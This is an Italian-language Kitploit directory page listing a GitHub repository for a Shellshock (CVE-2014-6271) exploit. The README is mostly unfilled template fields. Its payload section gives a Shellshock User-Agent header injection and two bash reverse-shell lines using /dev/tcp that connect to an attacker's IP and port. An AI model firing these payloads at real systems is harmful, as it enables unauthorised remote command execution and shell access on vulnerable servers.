Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Shell-Shock — *CVE-2014-6271* Exploit Unix di Esecuzione Arbitraria di Codice comunemente noto come Shell Shock. Esempi, Documentazione, Risposta agli Incidenti e Valutazione di Vulnerabilità/Rischio, e Risorse Aggiuntive possono essere inseriti qui. Divertiti :) --- somhmxxghoul --- | Kitploit
Strumenti/GitHubGitHub/somhm-solutions/shell-shock
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneRisposta agli IncidentiStrumento di Accesso RemotoSviluppo Payload

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
somhm-solutions/shell-shock

Shell-Shock

*CVE-2014-6271* Exploit Unix di Esecuzione Arbitraria di Codice comunemente noto come Shell Shock. Esempi, Documentazione, Risposta agli Incidenti e Valutazione di Vulnerabilità/Rischio, e Risorse Aggiuntive possono essere inseriti qui. Divertiti :) --- somhmxxghoul ---

Vedi Repository
16 anni faNon ancora revisionato

Shell Shock

*Autore(i): [email protected] *Manutentore(i): ** *Dipartimento: DevOps *Licenze: **

Panoramica

Shell Shock: Escalation dei privilegi, esecuzione remota di codice Famiglia di bug nella shell Bash di Unix. Consente l'esecuzione di comandi arbitrari.

Vettori di sfruttamento


Payloads

  • user agent di shellshock = User-Agent: () { :; } ; <$BASH_COMMAND>
  • payload rshell = bash -i >& /dev/tcp/127.0.0.1
    • reindirizzamento rshell al listener = bash -i >& /dev/tcp/$YOUR_IP:$PORT

Trucchi

Progettazione:

  • Scopo:
  • Contenuti:
  • Server:
    • Applicazione:
    • Database:
  • Rete:
    • DNS:
    • Percorsi:
  • Dipendenze dell'applicazione:
  • Programmi dipendenti:

Utilizzo di base:

  • Utilizzo:

  • Casi d'uso comuni:

  • Esempi:

Test

Input di test

  • Parametri:
  • Azioni:

Output di test

  • Output:
  • Screenshot:
  • Video:
  • Ecc:

Note:* [opzione]:

Scarica lo strumento